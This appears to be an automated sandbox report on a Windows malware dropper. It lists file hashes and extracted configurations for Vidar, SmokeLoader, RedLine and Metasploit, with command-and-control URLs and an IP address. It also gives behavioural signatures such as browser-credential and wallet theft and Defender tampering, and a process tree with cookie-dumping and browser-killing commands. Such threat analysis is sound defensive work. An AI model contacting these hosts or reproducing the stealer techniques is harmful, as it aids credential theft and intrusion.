Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    101s
  • max time network
    1812s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    30-07-2021 10:08

General

  • Target

    8 (23).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

28_7_r

C2

zertypelil.xyz:80

Extracted

Family

redline

Botnet

sel22

C2

salkefard.xyz:80

Extracted

Family

redline

Botnet

5k_ABSOLUTE

C2

45.14.49.117:14251

Extracted

Family

vidar

Version

39.8

Botnet

932

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    932

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 53 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 13 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 13 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 26 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1900
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2688
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2524
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2508
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2372
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2360
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1436
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1344
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1276
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1092
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:1032
                        • C:\Users\Admin\AppData\Roaming\tbfiiwu
                          C:\Users\Admin\AppData\Roaming\tbfiiwu
                          2⤵
                            PID:4464
                          • C:\Users\Admin\AppData\Roaming\dhfiiwu
                            C:\Users\Admin\AppData\Roaming\dhfiiwu
                            2⤵
                              PID:5952
                              • C:\Users\Admin\AppData\Roaming\dhfiiwu
                                C:\Users\Admin\AppData\Roaming\dhfiiwu
                                3⤵
                                  PID:5440
                              • C:\Users\Admin\AppData\Roaming\tbfiiwu
                                C:\Users\Admin\AppData\Roaming\tbfiiwu
                                2⤵
                                  PID:4608
                                • C:\Users\Admin\AppData\Roaming\dhfiiwu
                                  C:\Users\Admin\AppData\Roaming\dhfiiwu
                                  2⤵
                                    PID:5516
                                    • C:\Users\Admin\AppData\Roaming\dhfiiwu
                                      C:\Users\Admin\AppData\Roaming\dhfiiwu
                                      3⤵
                                        PID:5928
                                    • C:\Users\Admin\AppData\Roaming\dhfiiwu
                                      C:\Users\Admin\AppData\Roaming\dhfiiwu
                                      2⤵
                                        PID:3556
                                        • C:\Users\Admin\AppData\Roaming\dhfiiwu
                                          C:\Users\Admin\AppData\Roaming\dhfiiwu
                                          3⤵
                                            PID:5136
                                        • C:\Users\Admin\AppData\Roaming\tbfiiwu
                                          C:\Users\Admin\AppData\Roaming\tbfiiwu
                                          2⤵
                                            PID:3580
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                          1⤵
                                            PID:340
                                          • C:\Users\Admin\AppData\Local\Temp\8 (23).exe
                                            "C:\Users\Admin\AppData\Local\Temp\8 (23).exe"
                                            1⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:584
                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of WriteProcessMemory
                                              PID:1916
                                              • C:\Users\Admin\AppData\Local\Temp\7zSC7737494\setup_install.exe
                                                "C:\Users\Admin\AppData\Local\Temp\7zSC7737494\setup_install.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious use of WriteProcessMemory
                                                PID:2588
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3676
                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC7737494\sonia_1.exe
                                                    sonia_1.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2912
                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC7737494\sonia_1.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\7zSC7737494\sonia_1.exe" -a
                                                      6⤵
                                                        PID:2556
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                    4⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:3576
                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC7737494\sonia_2.exe
                                                      sonia_2.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Checks SCSI registry key(s)
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious behavior: MapViewOfSection
                                                      PID:2188
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                    4⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:3168
                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC7737494\sonia_3.exe
                                                      sonia_3.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Modifies system certificate store
                                                      PID:3864
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 1384
                                                        6⤵
                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                        • Program crash
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4624
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                    4⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1428
                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC7737494\sonia_4.exe
                                                      sonia_4.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1748
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                    4⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:4060
                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC7737494\sonia_5.exe
                                                      sonia_5.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      PID:2420
                                                      • C:\Users\Admin\Documents\MgOmfmqEwoJmDrPLVpkstPsv.exe
                                                        "C:\Users\Admin\Documents\MgOmfmqEwoJmDrPLVpkstPsv.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4820
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:4488
                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                            PID:5512
                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                            7⤵
                                                              PID:2060
                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                                PID:2552
                                                            • C:\Users\Admin\Documents\I15NgoSAJR2pvaDJ_6El1VL0.exe
                                                              "C:\Users\Admin\Documents\I15NgoSAJR2pvaDJ_6El1VL0.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:4844
                                                              • C:\Users\Admin\Documents\I15NgoSAJR2pvaDJ_6El1VL0.exe
                                                                "C:\Users\Admin\Documents\I15NgoSAJR2pvaDJ_6El1VL0.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Checks SCSI registry key(s)
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:4616
                                                            • C:\Users\Admin\Documents\YCQSYCTUDCSZdnwfmdTM9hKO.exe
                                                              "C:\Users\Admin\Documents\YCQSYCTUDCSZdnwfmdTM9hKO.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:4836
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 660
                                                                7⤵
                                                                • Program crash
                                                                PID:1224
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 672
                                                                7⤵
                                                                • Program crash
                                                                PID:2200
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 720
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                • Program crash
                                                                PID:5076
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 748
                                                                7⤵
                                                                • Program crash
                                                                PID:1176
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 900
                                                                7⤵
                                                                • Program crash
                                                                PID:5112
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1080
                                                                7⤵
                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                • Program crash
                                                                PID:5020
                                                            • C:\Users\Admin\Documents\nk6Lyu8T6eQEUs2I7Y9giBmm.exe
                                                              "C:\Users\Admin\Documents\nk6Lyu8T6eQEUs2I7Y9giBmm.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:4828
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 660
                                                                7⤵
                                                                • Program crash
                                                                PID:1048
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 676
                                                                7⤵
                                                                • Program crash
                                                                PID:4044
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 636
                                                                7⤵
                                                                • Program crash
                                                                PID:4620
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 692
                                                                7⤵
                                                                • Program crash
                                                                PID:4124
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 1072
                                                                7⤵
                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                • Program crash
                                                                PID:4852
                                                            • C:\Users\Admin\Documents\kZr9mCu74tFXhxb_OM14W1S2.exe
                                                              "C:\Users\Admin\Documents\kZr9mCu74tFXhxb_OM14W1S2.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:5028
                                                              • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:5084
                                                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:4040
                                                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:3768
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:5464
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:5240
                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  8⤵
                                                                    PID:1212
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    8⤵
                                                                      PID:5760
                                                                • C:\Users\Admin\Documents\k5iZKNM7BafvSDD_6BV3ZvWA.exe
                                                                  "C:\Users\Admin\Documents\k5iZKNM7BafvSDD_6BV3ZvWA.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  PID:5016
                                                                  • C:\Users\Admin\Documents\k5iZKNM7BafvSDD_6BV3ZvWA.exe
                                                                    "C:\Users\Admin\Documents\k5iZKNM7BafvSDD_6BV3ZvWA.exe" -a
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:4020
                                                                • C:\Users\Admin\Documents\YFZjxSxo7vinL5s4Ri0J4ZXK.exe
                                                                  "C:\Users\Admin\Documents\YFZjxSxo7vinL5s4Ri0J4ZXK.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4992
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                    7⤵
                                                                      PID:5932
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /f /im chrome.exe
                                                                        8⤵
                                                                        • Kills process with taskkill
                                                                        PID:6016
                                                                  • C:\Users\Admin\Documents\RcQZwVvx3_vNLZIG6XhzMwDI.exe
                                                                    "C:\Users\Admin\Documents\RcQZwVvx3_vNLZIG6XhzMwDI.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:4984
                                                                    • C:\Users\Admin\Documents\RcQZwVvx3_vNLZIG6XhzMwDI.exe
                                                                      "C:\Users\Admin\Documents\RcQZwVvx3_vNLZIG6XhzMwDI.exe"
                                                                      7⤵
                                                                        PID:4520
                                                                        • C:\Windows\System32\Conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          8⤵
                                                                            PID:5156
                                                                      • C:\Users\Admin\Documents\2SU6WSzzXcU9Kl75eXC42Y77.exe
                                                                        "C:\Users\Admin\Documents\2SU6WSzzXcU9Kl75eXC42Y77.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Checks BIOS information in registry
                                                                        • Checks whether UAC is enabled
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:4976
                                                                      • C:\Users\Admin\Documents\2ed4Yyi5SvA7k3z3ZIg374s4.exe
                                                                        "C:\Users\Admin\Documents\2ed4Yyi5SvA7k3z3ZIg374s4.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:4964
                                                                        • C:\Users\Admin\Documents\2ed4Yyi5SvA7k3z3ZIg374s4.exe
                                                                          "C:\Users\Admin\Documents\2ed4Yyi5SvA7k3z3ZIg374s4.exe"
                                                                          7⤵
                                                                            PID:960
                                                                        • C:\Users\Admin\Documents\3mNn5CIyVPmHaKdgrjubkziy.exe
                                                                          "C:\Users\Admin\Documents\3mNn5CIyVPmHaKdgrjubkziy.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:4948
                                                                          • C:\Users\Admin\Documents\3mNn5CIyVPmHaKdgrjubkziy.exe
                                                                            "C:\Users\Admin\Documents\3mNn5CIyVPmHaKdgrjubkziy.exe"
                                                                            7⤵
                                                                              PID:2872
                                                                            • C:\Users\Admin\Documents\3mNn5CIyVPmHaKdgrjubkziy.exe
                                                                              "C:\Users\Admin\Documents\3mNn5CIyVPmHaKdgrjubkziy.exe"
                                                                              7⤵
                                                                                PID:4972
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                  8⤵
                                                                                    PID:5556
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                      9⤵
                                                                                        PID:5372
                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5372.0.1739081593\881095526" -parentBuildID 20200403170909 -prefsHandle 1520 -prefMapHandle 1512 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5372 "\\.\pipe\gecko-crash-server-pipe.5372" 1604 gpu
                                                                                          10⤵
                                                                                            PID:5276
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                        8⤵
                                                                                          PID:4368
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffa210c4f50,0x7ffa210c4f60,0x7ffa210c4f70
                                                                                            9⤵
                                                                                              PID:4164
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1708,3864857209428539363,6446616870267298926,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1720 /prefetch:2
                                                                                              9⤵
                                                                                                PID:4484
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1708,3864857209428539363,6446616870267298926,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2112 /prefetch:8
                                                                                                9⤵
                                                                                                  PID:4952
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1708,3864857209428539363,6446616870267298926,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1768 /prefetch:8
                                                                                                  9⤵
                                                                                                    PID:4528
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1708,3864857209428539363,6446616870267298926,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2592 /prefetch:1
                                                                                                    9⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5512
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1708,3864857209428539363,6446616870267298926,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
                                                                                                    9⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5876
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1708,3864857209428539363,6446616870267298926,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
                                                                                                    9⤵
                                                                                                      PID:5720
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1708,3864857209428539363,6446616870267298926,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
                                                                                                      9⤵
                                                                                                        PID:4992
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1708,3864857209428539363,6446616870267298926,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:1
                                                                                                        9⤵
                                                                                                          PID:5344
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1708,3864857209428539363,6446616870267298926,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
                                                                                                          9⤵
                                                                                                            PID:2756
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1708,3864857209428539363,6446616870267298926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5036 /prefetch:8
                                                                                                            9⤵
                                                                                                              PID:5336
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1708,3864857209428539363,6446616870267298926,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5780 /prefetch:8
                                                                                                              9⤵
                                                                                                                PID:5564
                                                                                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                                                9⤵
                                                                                                                  PID:5056
